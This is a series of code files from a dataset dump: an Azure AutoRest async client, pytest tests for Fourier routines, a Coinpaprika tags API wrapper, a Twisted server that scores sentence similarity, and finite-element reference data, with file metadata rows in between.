if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_referenced_constant(self, **kwargs: Any) -> JSONType:
"""Get value 'green-color' from the constant.
:return: JSON object
:rtype: JSONType
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == {
"ColorConstant": "green-color", # Default value is "green-color". Referenced
Color Constant Description. Has constant value: "green-color".
"field1": "str" # Optional. Sample string.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_enum_get_referenced_constant_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_referenced_constant(self, enum_string_body: JSONType, **kwargs: Any) -> None:
"""Sends value 'green-color' from a constant.
:param enum_string_body: enum string body.
:type enum_string_body: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
enum_string_body = {
"ColorConstant": "green-color", # Default value is "green-color". Referenced
Color Constant Description. Has constant value: "green-color".
"field1": "str" # Optional. Sample string.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = enum_string_body
request = build_enum_put_referenced_constant_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
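# Minimal usage sketch. Assumptions: the generated async client for this
# test package is named AutoRestSwaggerBATService, it accepts an `endpoint`
# keyword, and it exposes the operation groups above as `string` and `enum`
# attributes, as their class docstrings describe.
import asyncio
from bodystringversiontolerant.aio import AutoRestSwaggerBATService

async def main():
    async with AutoRestSwaggerBATService(endpoint="http://localhost:3000") as client:
        await client.string.put_empty()
        print(await client.string.get_empty())         # ""
        print(await client.enum.get_not_expandable())  # e.g. "red color"

asyncio.run(main())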
| 38.514465
| 106
| 0.647898
| 3,412
| 30,619
| 5.6568
| 0.071805
| 0.039376
| 0.035439
| 0.025595
| 0.915911
| 0.907311
| 0.882441
| 0.858764
| 0.849593
| 0.835967
| 0
| 0.012034
| 0.250955
| 30,619
| 794
| 107
| 38.562972
| 0.821147
| 0.080571
| 0
| 0.757709
| 0
| 0
| 0.028948
| 0.003125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004405
| false
| 0
| 0.015419
| 0
| 0.090308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b3843b991e8e2730b1021815dd31277a43c32d8
| 8,566
|
py
|
Python
|
bokeh_app/scripts/functions/test_fourier.py
|
goodteamname/spino
|
aa8c6cfa9f94a639c306d85ca6df2483108fda37
|
[
"MIT"
] | null | null | null |
bokeh_app/scripts/functions/test_fourier.py
|
goodteamname/spino
|
aa8c6cfa9f94a639c306d85ca6df2483108fda37
|
[
"MIT"
] | 9
|
2020-10-26T10:57:00.000Z
|
2020-11-01T14:48:21.000Z
|
bokeh_app/scripts/functions/test_fourier.py
|
goodteamname/spino
|
aa8c6cfa9f94a639c306d85ca6df2483108fda37
|
[
"MIT"
] | 1
|
2020-10-26T10:41:31.000Z
|
2020-10-26T10:41:31.000Z
|
import pytest
import numpy.testing as npt
@pytest.mark.parametrize(
"test, expectedShape, raises",
[
(
[1, 2, 3],
(1, 3),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
(3, 3),
None
),
(
[1, 2, 3, 4, 5, 6],
(2, 3),
None
),
(
[[1, 2, 3], [4, 5, 6]],
(0, 0),
ValueError
),
(
[1],
(0, 0),
ValueError
),
(
[],
(0, 0),
ValueError
),
])
def test_dft(test, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
npt.assert_equal(fourier_functions.fourier_to_coefficients(test)[1].shape, expectedShape)
else:
npt.assert_equal(fourier_functions.fourier_to_coefficients(test)[1].shape, expectedShape)
@pytest.mark.parametrize(
"test, expectedShape, raises",
[
(
[1, 2, 3],
(1, 3),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
(3, 3),
None
),
(
[1, 2, 3, 4, 5, 6],
(2, 3),
None
),
(
[[1, 2, 3], [4, 5, 6]],
(0, 3),
ValueError
),
(
[1],
(0, 0),
ValueError
),
(
[],
(0, 0),
ValueError
),
])
def test_dfs(test, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
npt.assert_equal(fourier_functions.dfs(test)[1].shape, expectedShape)
else:
npt.assert_equal(fourier_functions.dfs(test)[1].shape, expectedShape)
@pytest.mark.parametrize(
"test_data, test_times, expectedShape, raises",
[
(
[1, 2, 3],
[1, 2, 3],
(3, 2),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
[1, 2, 3, 4, 5, 6, 7],
(7, 2),
None
),
(
[1, 2, 3, 4, 5, 6],
[1, 2, 3, 4, 5, 6],
(5, 2),
None
),
(
[[1, 2, 3], [4, 5, 6]],
[1, 2, 3, 4, 5, 6],
(3, 2),
ValueError
),
(
[1],
[1, 2, 3, 4, 5, 6],
(1, 2),
ValueError
),
(
[],
[1, 2, 3, 4, 5, 6],
(1, 0),
ValueError
),
])
def test_freq(test_data, test_times, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
npt.assert_equal(fourier_functions.fourier_to_freq_spectrum(test_data, test_times).shape, expectedShape)
else:
npt.assert_equal(fourier_functions.fourier_to_freq_spectrum(test_data, test_times).shape, expectedShape)
@pytest.mark.parametrize(
"test_data, expectedShape, raises",
[
(
[1, 2, 3],
(3, ),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
(7,),
None
),
(
[1, 2, 3, 4, 5, 6],
(6,),
None
),
(
[[1, 2, 3], [4, 5, 6]],
(0,),
ValueError
),
(
[1],
(0,),
ValueError
),
(
[],
(0,),
ValueError
),
])
def test_fourier_approx(test_data, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
# alpha0, table = fourier_functions.fourier_to_coefficients(test_data)
npt.assert_equal(
fourier_functions.fourier_approx(
fourier_functions.fourier_to_coefficients(test_data)[0],
fourier_functions.fourier_to_coefficients(test_data)[1],
test_data).shape,
expectedShape)
else:
alpha0, table = fourier_functions.fourier_to_coefficients(test_data)
npt.assert_equal(fourier_functions.fourier_approx(alpha0, table, test_data).shape, expectedShape)
@pytest.mark.parametrize(
"test_data, test_times, components, expectedShape0, expectedShape1, expectedShape2, raises",
[
(
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
2,
(5, 3),
(2, 3),
(5, 4),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
[1, 2, 3, 4, 5, 6, 7],
2,
(7, 3),
(2, 3),
(7, 4),
None
),
(
[1, 2, 3, 4, 5, 6],
[1, 2, 3, 4, 5, 6],
2,
(6, 3),
(2, 3),
(6, 4),
None
),
(
[[1, 2, 3], [4, 5, 6]],
[1, 2, 3, 4, 5, 6],
2,
(5, 3),
(3, 2),
(5, 4),
ValueError
),
(
[1],
[1, 2, 3, 4, 5, 6],
2,
(1, 3),
(2, 3),
(1, 4),
ValueError
),
(
[],
[1, 2, 3, 4, 5, 6],
2,
(0, 3),
(2, 3),
(0, 4),
ValueError
),
])
def test_calc_residuals(test_data, test_times, components, expectedShape0, expectedShape1, expectedShape2, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
alpha0, df = fourier_functions.fourier_to_coefficients(test_data)
print(alpha0)
print(df)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[0].shape,
expectedShape0
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[1].shape,
expectedShape1
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[2].shape,
expectedShape2
)
else:
alpha0, df = fourier_functions.fourier_to_coefficients(test_data)
print(alpha0)
print(df)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[0].shape,
expectedShape0
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[1].shape,
expectedShape1
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[2].shape,
expectedShape2
)
@pytest.mark.parametrize(
"test_data, test_times",
[
(
[1, 2, 3, 4, 5, 7, 8, 3, 4, 5, 6, 4, 3, 4, 6, 7, 8, 9, 0, 64, 4],
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20],
),
])
def test_optimise_residuals(test_data, test_times):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
alpha0, df = fourier_functions.fourier_to_coefficients(test_data)
components = fourier_functions.optimise_residuals(alpha0, df, test_data)
print(alpha0)
print(df)
expectedShape0 = (len(test_data), components+1)
expectedShape1 = (components, 3)
expectedShape2 = (len(test_data), 4)
npt.assert_equal(fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[0].shape, expectedShape0)
npt.assert_equal(fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[1].shape, expectedShape1)
npt.assert_equal(fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[2].shape, expectedShape2)
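# Every test above follows the same shape-or-ValueError pattern. A
# self-contained sketch of that pattern using a stand-in function (NOT part
# of fourier_functions); pytest and npt are already imported at the top of
# this file.
import numpy as np

def _rows_of_three(data):
    """Stand-in helper: reshape a flat sequence into (n, 3) rows, or raise."""
    arr = np.asarray(data, dtype=float)
    if arr.ndim != 1 or arr.size < 3:
        raise ValueError("expected a flat sequence of at least 3 values")
    n = arr.size // 3
    return arr[: n * 3].reshape(n, 3)

@pytest.mark.parametrize(
    "test, expectedShape, raises",
    [([1, 2, 3], (1, 3), None), ([1], (0, 0), ValueError)],
)
def test_rows_of_three(test, expectedShape, raises):
    if raises:
        with pytest.raises(raises):
            _rows_of_three(test)
    else:
        npt.assert_equal(_rows_of_three(test).shape, expectedShape)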
| 27.022082
| 126
| 0.466028
| 907
| 8,566
| 4.245865
| 0.081588
| 0.021293
| 0.026487
| 0.030122
| 0.890418
| 0.867567
| 0.850428
| 0.796157
| 0.782914
| 0.708387
| 0
| 0.075114
| 0.409409
| 8,566
| 316
| 127
| 27.107595
| 0.686104
| 0.054284
| 0
| 0.71134
| 0
| 0
| 0.02974
| 0
| 0
| 0
| 0
| 0
| 0.058419
| 1
| 0.020619
| false
| 0
| 0.027491
| 0
| 0.04811
| 0.020619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
863256f4fa84c9896de8c6cdc9b3ad9876192f99
| 3,569
|
py
|
Python
|
src/Coinpaprika/CoinpaprikaTags.py
|
coinpaper/coinpaprika-api-python-client
|
f819e38cf8657c9751ee55e638f3ed33d32346a4
|
[
"MIT"
] | 5
|
2021-01-30T10:54:33.000Z
|
2022-02-18T03:05:03.000Z
|
src/Coinpaprika/CoinpaprikaTags.py
|
coinpaper/coinpaprika-api-python-client
|
f819e38cf8657c9751ee55e638f3ed33d32346a4
|
[
"MIT"
] | 1
|
2021-09-01T14:51:49.000Z
|
2021-09-01T14:51:49.000Z
|
src/Coinpaprika/CoinpaprikaTags.py
|
coinpaper/coinpaprika-api-python-client
|
f819e38cf8657c9751ee55e638f3ed33d32346a4
|
[
"MIT"
] | null | null | null |
from typing import List, Dict
from .Coinpaprika import Coinpaprika
class CoinpaprikaTags:
def __call__(self, *additional_fields: str) -> List[Dict]:
"""
List tags
:param additional_fields: List of additional fields to include in query result for each tag.
Currently supported values are: "coins" and "icos".
:return: [
{
"id": "blockchain-service",
"name": "Blockchain Service",
"coin_counter": 160,
"ico_counter": 80,
"description": "A solution for companies wanting to build, host and use their own blockchain apps, smart contracts and functions on the blockchain.",
"type": "functional",
"coins": [
"dcr-decred",
"hc-hypercash",
"nxs-nexus"
],
"icos": [
"kodakcoin-kodakone",
"acad-academy"
]
}
]
"""
return self.all(*additional_fields)
@staticmethod
def all(*additional_fields) -> List[Dict]:
"""
List tags
:param additional_fields: List of additional fields to include in query result for each tag.
Currently supported values are: "coins" and "icos".
:return: [
{
"id": "blockchain-service",
"name": "Blockchain Service",
"coin_counter": 160,
"ico_counter": 80,
"description": "A solution for companies wanting to build, host and use their own blockchain apps, smart contracts and functions on the blockchain.",
"type": "functional",
"coins": [
"dcr-decred",
"hc-hypercash",
"nxs-nexus"
],
"icos": [
"kodakcoin-kodakone",
"acad-academy"
]
}
]
"""
additional_fields_str = ",".join(additional_fields)
return Coinpaprika.get("/tags", params={"additional_fields": additional_fields_str})
@staticmethod
def with_id(tag_id, *additional_fields: str) -> Dict:
"""
        Get tag by ID
        :param tag_id: ID of the tag to look up, e.g. "blockchain-service".
        :param additional_fields: List of additional fields to include in query result for each tag.
Currently supported values are: "coins" and "icos".
:return: {
"id": "blockchain-service",
"name": "Blockchain Service",
"coin_counter": 160,
"ico_counter": 80,
"description": "A solution for companies wanting to build, host and use their own blockchain apps, smart contracts and functions on the blockchain.",
"type": "functional",
"coins": [
"dcr-decred",
"hc-hypercash",
"nxs-nexus"
],
"icos": [
"kodakcoin-kodakone",
"acad-academy"
]
}
"""
additional_fields_str = ",".join(additional_fields)
return Coinpaprika.get(f"/tags/{tag_id}", params={"additional_fields": additional_fields_str})
| 39.655556
| 169
| 0.464556
| 297
| 3,569
| 5.474747
| 0.262626
| 0.177122
| 0.070111
| 0.046125
| 0.851169
| 0.851169
| 0.800738
| 0.800738
| 0.800738
| 0.800738
| 0
| 0.007523
| 0.4413
| 3,569
| 89
| 170
| 40.101124
| 0.807924
| 0.650602
| 0
| 0.307692
| 0
| 0
| 0.079826
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.153846
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
86328f63b583b319613fa3fd9e9cb3978380b8f4
| 96
|
py
|
Python
|
medium/unit-testing/mock_example.py
|
saneravi/ML_Stuff
|
74e1ed7ba9f4dccb555792315a14ba6071150304
|
[
"MIT"
] | 209
|
2015-01-02T03:47:12.000Z
|
2022-03-06T16:54:47.000Z
|
medium/unit-testing/mock_example.py
|
Kerwin-Xie/algorithms
|
4347a9b7bf54ef378d16d26ef9e357ddc710664b
|
[
"MIT"
] | 3
|
2015-12-06T14:40:34.000Z
|
2021-03-22T17:40:24.000Z
|
medium/unit-testing/mock_example.py
|
Kerwin-Xie/algorithms
|
4347a9b7bf54ef378d16d26ef9e357ddc710664b
|
[
"MIT"
] | 114
|
2015-01-31T08:37:10.000Z
|
2022-02-23T04:42:28.000Z
|
import datetime
def generate_filename():
return f"{datetime.datetime.now():%Y-%m-%d}.png"
| 16
| 52
| 0.6875
| 14
| 96
| 4.642857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 96
| 5
| 53
| 19.2
| 0.77381
| 0
| 0
| 0
| 1
| 0
| 0.395833
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
8632d44bad398f1ca4197110829df69df1ed24eb
| 115
|
py
|
Python
|
flask_mongoengine/wtf/__init__.py
|
lokeshmeher/custom_flask_mongoengine
|
9d6e605f4c17c9d7ca0e55a539215707c8e1272d
|
[
"BSD-3-Clause"
] | null | null | null |
flask_mongoengine/wtf/__init__.py
|
lokeshmeher/custom_flask_mongoengine
|
9d6e605f4c17c9d7ca0e55a539215707c8e1272d
|
[
"BSD-3-Clause"
] | null | null | null |
flask_mongoengine/wtf/__init__.py
|
lokeshmeher/custom_flask_mongoengine
|
9d6e605f4c17c9d7ca0e55a539215707c8e1272d
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_mongoengine.wtf.orm import model_fields, model_form
from flask_mongoengine.wtf.base import WtfBaseField
| 38.333333
| 62
| 0.878261
| 17
| 115
| 5.705882
| 0.647059
| 0.185567
| 0.412371
| 0.474227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078261
| 115
| 2
| 63
| 57.5
| 0.915094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
863e98afe63fea81844127a53b6f0a1e9165a703
| 5,517
|
py
|
Python
|
server.py
|
Jental/find_answer
|
0f178e4b033b5c5e006c1f3779db1d9a3baddacf
|
[
"MIT"
] | null | null | null |
server.py
|
Jental/find_answer
|
0f178e4b033b5c5e006c1f3779db1d9a3baddacf
|
[
"MIT"
] | null | null | null |
server.py
|
Jental/find_answer
|
0f178e4b033b5c5e006c1f3779db1d9a3baddacf
|
[
"MIT"
] | null | null | null |
from twisted.web.resource import Resource
from twisted.internet import reactor
from twisted.web.server import Site
import json
import numpy as np
import similarity
class MainPage(Resource):
isLeaf = True
def __init__(self, finder):
Resource.__init__(self)
self.finder = finder
def render_GET(self, request):
print("You're request was %s" % request.args)
request.responseHeaders.addRawHeader(b"Content-Type", b"application/json; charset=utf-8")
if b'q' in request.args:
for bsentence in request.args[b'q']:
sentence = bsentence.decode('utf-8')
print('->', sentence)
                answers = []
                # One record per finder mode; the three modes previously
                # built a1, a2 and a3 with identical structure.
                for finder_mode in range(3):
                    answer, found, dist, vec, fvec, fvec2 = self.finder.find_answer(sentence, finder_mode)
                    answers.append({
                        'answer': answer,
                        'found': found,
                        'vector': np.array2string(vec),
                        'found_vector': np.array2string(fvec),
                        'found_vector_2': np.array2string(fvec2),
                        'dist': dist,
                        'similarities': {
                            'simple': similarity.sentence_similarity_samewords(sentence, found),
                            'wordvec': similarity.sentence_similarity_wordvectors(sentence, found),
                            'jsm': similarity.sentence_similarity_jsm(sentence, found),
                            'jsm, su': similarity.sentence_similarity_jsm(sentence, found, mode=1),
                            'jsm, avg': similarity.sentence_similarity_jsm(sentence, found, mode=2),
                            'jsm, pairs': similarity.sentence_similarity_jsm_pairs(sentence, found),
                            'jsm, pairs, su': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=1),
                            'jsm, pairs, avg': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=2),
                            'jsm, allpairs': similarity.sentence_similarity_jsm_allpairs(sentence, found),
                            'jsm, allpairs, su': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=1),
                            'jsm, allpairs, avg': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=2),
                            'vec': similarity.sentence_similarity_vec(sentence, found),
                            'vec2': similarity.sentence_similarity_vec2(sentence, found)
                        }
                    })
                res = json.dumps(answers, ensure_ascii=False)
answerJson = res.encode('utf-8')
print('<-', res)
return answerJson
else:
request.setResponseCode(400)
print("Unknown query")
return '{"error" ; "Unknown query"}'.encode('utf-8')
| 52.542857
| 103
| 0.646185
| 595
| 5,517
| 5.793277
| 0.147899
| 0.203655
| 0.316797
| 0.24282
| 0.815492
| 0.815492
| 0.815492
| 0.815492
| 0.815492
| 0.815492
| 0
| 0.014363
| 0.230198
| 5,517
| 104
| 104
| 53.048077
| 0.797269
| 0.015226
| 0
| 0.612245
| 0
| 0
| 0.124655
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020408
| false
| 0
| 0.061224
| 0
| 0.122449
| 0.040816
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
866b6fbb387f3280e15fadd668dbca7cb16bb100
| 16,385
|
py
|
Python
|
tests/vmap/reference_data.py
|
alexander-maier/pylife
|
a9dceb3f364af16bf0a2d3015e34fa47192bfcf6
|
[
"Apache-2.0",
"MIT"
] | 57
|
2019-11-29T23:45:08.000Z
|
2022-03-31T09:11:20.000Z
|
tests/vmap/reference_data.py
|
alexander-maier/pylife
|
a9dceb3f364af16bf0a2d3015e34fa47192bfcf6
|
[
"Apache-2.0",
"MIT"
] | 6
|
2021-03-29T10:40:42.000Z
|
2022-03-30T12:29:10.000Z
|
tests/vmap/reference_data.py
|
alexander-maier/pylife
|
a9dceb3f364af16bf0a2d3015e34fa47192bfcf6
|
[
"Apache-2.0",
"MIT"
] | 10
|
2020-09-28T17:44:47.000Z
|
2022-01-21T17:59:19.000Z
|
import numpy as np
import pandas as pd
beam_2d_squ_nodes = pd.DataFrame(
data=np.array([[-30., 25., 0.],
[-25., 25., 0.],
[-20., 25., 0.],
[-15., 25., 0.],
[-10., 25., 0.],
[-5., 25., 0.],
[0., 25., 0.],
[5., 25., 0.],
[10., 25., 0.],
[-30., 30., 0.],
[-25., 30., 0.],
[-20., 30., 0.],
[-15., 30., 0.],
[-10., 30., 0.],
[-5., 30., 0.],
[0., 30., 0.],
[5., 30., 0.],
[10., 30., 0.]]),
columns=['x', 'y', 'z'],
index=pd.Index(np.arange(1, 19), name="node_id")
)
beam_2d_squ_mesh_index = pd.MultiIndex.from_arrays(
[
[1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8],
[1, 2, 11, 10, 2, 3, 12, 11, 3, 4, 13, 12, 4, 5, 14, 13, 5, 6, 15, 14, 6, 7, 16, 15, 7, 8, 17, 16, 8, 9, 18, 17]
],
names=['element_id', 'node_id']
)
beam_2d_squ_mesh_index_load = pd.MultiIndex.from_arrays(
[
[8],
[9]
],
names=['element_id', 'node_id']
)
beam_2d_squ_mesh_index_fix = pd.MultiIndex.from_arrays(
[
[1, 1],
[1, 10]
],
names=['element_id', 'node_id']
)
rotsym_quad_mesh_index_ysym = pd.MultiIndex.from_arrays(
[
[7, 7, 7, 7, 8, 8, 8, 8],
[5, 4, 13, 14, 14, 13, 2, 6]
],
names=['element_id', 'node_id']
)
rotsym_quad_mesh_coords_ysym = pd.DataFrame(
data=np.array([
[5.0, 10., 0.0],
[7.5, 12.5, 0.0],
[4.70654774, 12.4430714, 0.0],
[2.5, 10., 0.0],
[2.5, 10., 0.0],
[4.70654774, 12.4430714, 0.0],
[2.66258526, 12.3712873, 0.0],
[0.0, 10., 0.0],
]),
columns=['x', 'y', 'z'],
index=rotsym_quad_mesh_index_ysym
)
rotsym_quad_stress_cauchy = pd.DataFrame(
data=np.array([
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
]),
columns=['S11', 'S22', 'S33', 'S12', 'S13', 'S23'],
index=pd.MultiIndex.from_tuples([
(1, 4),
(1, 8),
(1, 17),
(1, 13),
(2, 8),
(2, 9),
(2, 18),
(2, 17),
(3, 9),
(3, 1),
(3, 10),
(3, 18),
(4, 13),
(4, 17),
(4, 11),
(4, 2),
(5, 17),
(5, 18),
(5, 12),
(5, 11),
(6, 18),
(6, 10),
(6, 3),
(6, 12),
(7, 5),
(7, 4),
(7, 13),
(7, 14),
(8, 14),
(8, 13),
(8, 2),
(8, 6),
(9, 2),
(9, 11),
(9, 15),
(9, 6),
(10, 11),
(10, 12),
(10, 16),
(10, 15),
(11, 12),
(11, 3),
(11, 7),
(11, 16)],
names=['element_id', 'node_id'])
)
beam_2d_squ_mesh_coords = pd.DataFrame(data=np.array(
[
[-30., 25., 0.], # 1
[-25., 25., 0.], # 2
[-25., 30., 0.], # 11
[-30., 30., 0.], # 10
[-25., 25., 0.], # 2
[-20., 25., 0.], # 3
[-20., 30., 0.], # 12
[-25., 30., 0.], # 11
[-20., 25., 0.], # 3
[-15., 25., 0.], # 4
[-15., 30., 0.], # 13
[-20., 30., 0.], # 12
[-15., 25., 0.], # 4
[-10., 25., 0.], # 5
[-10., 30., 0.], # 14
[-15., 30., 0.], # 13
